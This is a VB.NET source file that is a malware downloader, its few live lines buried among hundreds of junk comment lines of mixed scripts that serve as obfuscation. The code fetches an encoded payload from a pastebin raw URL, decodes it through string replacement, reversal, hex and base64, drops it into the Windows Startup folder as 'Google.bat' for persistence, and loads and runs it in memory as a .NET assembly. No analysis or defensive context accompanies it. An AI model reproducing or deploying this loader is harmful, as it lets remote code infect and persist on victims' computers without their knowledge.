Imports System.IO

Module Module1
    Dim Kiler As New Net.WebClient
    Sub main()
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1

        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim oussama As String
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1

        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        oussama = "https://pastebin.com/raw/zKEUqCHz"
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim str As String = Kiler.DownloadString(oussama)
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        str = str.Replace("&", "4")
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1

        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        str = StrReverse(str)
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim b As Byte() = Convert.FromBase64String(艾克娜诶儿弗维杰艾艾德比艾弗维贝勒吾屁比迪提吾豆艾艾吾屁西丝艾贝(str))
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        IO.File.WriteAllBytes("C:\Users\" + Environment.UserName + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.bat", b)
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim ввавбаодввтмееобииивтииивоедмаоеиИИ As System.Reflection.Assembly
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim воееежвдмтМдМивЕвабрважврддидИ As System.Reflection.MethodInfo
        Dim оодъиоедъиеевииМиииодеждв As Object
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        ввавбаодввтмееобииивтииивоедмаоеиИИ = System.Reflection.Assembly.Load(b)
        воееежвдмтМдМивЕвабрважврддидИ = ввавбаодввтмееобииивтииивоедмаоеиИИ.EntryPoint
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        оодъиоедъиеевииМиииодеждв = ввавбаодввтмееобииивтииивоедмаоеиИИ.CreateInstance(воееежвдмтМдМивЕвабрважврддидИ.Name)
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        воееежвдмтМдМивЕвабрважврддидИ.Invoke(оодъиоедъиеевииМиииодеждв, Nothing)

    End Sub
    Public Function 艾克娜诶儿弗维杰艾艾德比艾弗维贝勒吾屁比迪提吾豆艾艾吾屁西丝艾贝(ByVal input As String) As String
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim out As New System.Text.StringBuilder
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        Dim data As String() = Split(input, " ")
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        'иेдъचपб्एेбв्рЕоअеИаअपМвдזפבעМирआмםצנאמדבたたタし弗比诶ョकоаиपआנ煙开西ョょバגשטקהסョ魚シ東尺比艾屁トシょキコんウ艾勒尺尺艾屁比艾OHLnMs1
        For Each s As String In data
            out.Append(Chr("&H" & s))
        Next
        Return out.ToString
    End Function
End Module
